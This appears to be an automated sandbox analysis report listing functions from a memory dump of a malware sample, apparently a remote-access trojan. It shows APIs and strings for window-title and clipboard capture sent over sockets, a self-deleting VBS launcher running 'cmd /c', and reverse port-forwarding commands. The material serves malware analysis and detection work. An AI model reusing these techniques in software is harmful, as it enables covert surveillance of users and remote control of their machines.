Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Uniqueness

Uniqueness Score: -1.00%

Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419FB9
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
Sleep.KERNEL32(000003E8), ref: 0041A0FD
GetLocalTime.KERNEL32(?), ref: 0041A105
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4

Strings

PG, xrefs: 0041A016
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09A, 0041A0BB, 0041A129
PG, xrefs: 0041A0C9
PG, xrefs: 0041A1AD
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
API String ID: 489098229-1431523004
Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9
open, xrefs: 0040D9B2
.vbs, xrefs: 0040D85F
Temp, xrefs: 0040D89A
""", 0, xrefs: 0040D8E1
exepath, xrefs: 0040D831
8SG, xrefs: 0040D80F
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Uniqueness

Uniqueness Score: -1.00%

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Uniqueness

Uniqueness Score: -1.00%

Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6

GetLastError.KERNEL32 ref: 00455CEF
__dosmaperr.LIBCMT ref: 00455CF6
GetFileType.KERNEL32(00000000), ref: 00455D02
GetLastError.KERNEL32 ref: 00455D0C
__dosmaperr.LIBCMT ref: 00455D15
CloseHandle.KERNEL32(00000000), ref: 00455D35
CloseHandle.KERNEL32(?), ref: 00455E7F
GetLastError.KERNEL32 ref: 00455EB1
__dosmaperr.LIBCMT ref: 00455EB8

Strings

H, xrefs: 00455E3D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
__alloca_probe_16.LIBCMT ref: 00453EEA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
__alloca_probe_16.LIBCMT ref: 00453F94
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
__freea.LIBCMT ref: 00454003
__freea.LIBCMT ref: 0045400F

Strings

\@E, xrefs: 00453F37, 00453DF1

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \@E
API String ID: 201697637-1814623452
Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768

Uniqueness

Uniqueness Score: -1.00%

Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
__alloca_probe_16.LIBCMT ref: 0044ACDB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
__alloca_probe_16.LIBCMT ref: 0044ADC0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
__freea.LIBCMT ref: 0044AE30

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

__freea.LIBCMT ref: 0044AE39
__freea.LIBCMT ref: 0044AE5E

Strings

$C, xrefs: 0044AC5B
PkGNG, xrefs: 0044AC4B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID: $C$PkGNG
API String ID: 3864826663-3740547665
Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

Uniqueness

Uniqueness Score: -1.00%

Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450A94
_free.LIBCMT ref: 00450AA2
_free.LIBCMT ref: 00450BD0
_free.LIBCMT ref: 00450BDB

Strings

\&G, xrefs: 00450C24
\&G, xrefs: 00450C1C
`&G, xrefs: 00450C34

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98

Uniqueness

Uniqueness Score: -1.00%

Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 00414C60, 00414C68, 00414C6C
65535, xrefs: 00414BB3

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040AD38
Sleep.KERNEL32(000001F4), ref: 0040AD43
GetForegroundWindow.USER32 ref: 0040AD49
GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
Sleep.KERNEL32(000003E8), ref: 0040AE54

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

{ User has been idle for , xrefs: 0040AE86
], xrefs: 0040ADE8
minutes }, xrefs: 0040AE7A
[, xrefs: 0040ADEE

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A

Strings

AppData, xrefs: 0040DB51
\system32, xrefs: 0040DAAE
UserProfile, xrefs: 0040DB58
ProgramData, xrefs: 0040DB5F
\SysWOW64, xrefs: 0040DB00
Temp, xrefs: 0040DA66
ProgramFiles, xrefs: 0040DB6E
WinDir, xrefs: 0040DA9B, 0040DABD, 0040DB0F
SystemDrive, xrefs: 0040DA91

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Uniqueness

Uniqueness Score: -1.00%

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32(?), ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

DisplayMessage, xrefs: 004055EC
CloseChat, xrefs: 00405609
GetMessage, xrefs: 004055F8

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
CloseHandle.KERNEL32(00000000), ref: 00417DE5
DeleteFileA.KERNEL32(00000000), ref: 00417DF4
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

0VG, xrefs: 00417DB5
Temp, xrefs: 00417D00
@, xrefs: 00417D8A
0VG, xrefs: 00417E21
<, xrefs: 00417D83

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA

Uniqueness

Uniqueness Score: -1.00%

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Uniqueness

Uniqueness Score: -1.00%

Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(?), ref: 004115AF

Strings

StopForward, xrefs: 00411690
NG, xrefs: 0041153A
StartReverse, xrefs: 0041167F
StartForward, xrefs: 00411673
StopReverse, xrefs: 004116A1
GetDirectListeningPort, xrefs: 004116B2

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Uniqueness

Uniqueness Score: -1.00%

Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27

Strings

asin, xrefs: 00456093
log10, xrefs: 00455F71, 00455FC1
pow, xrefs: 0045600B, 004560B7, 004560CA
log, xrefs: 00455FCD, 00455FD9
sqrt, xrefs: 004560AB
acos, xrefs: 0045609F
exp, xrefs: 00455FEC, 0045604E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

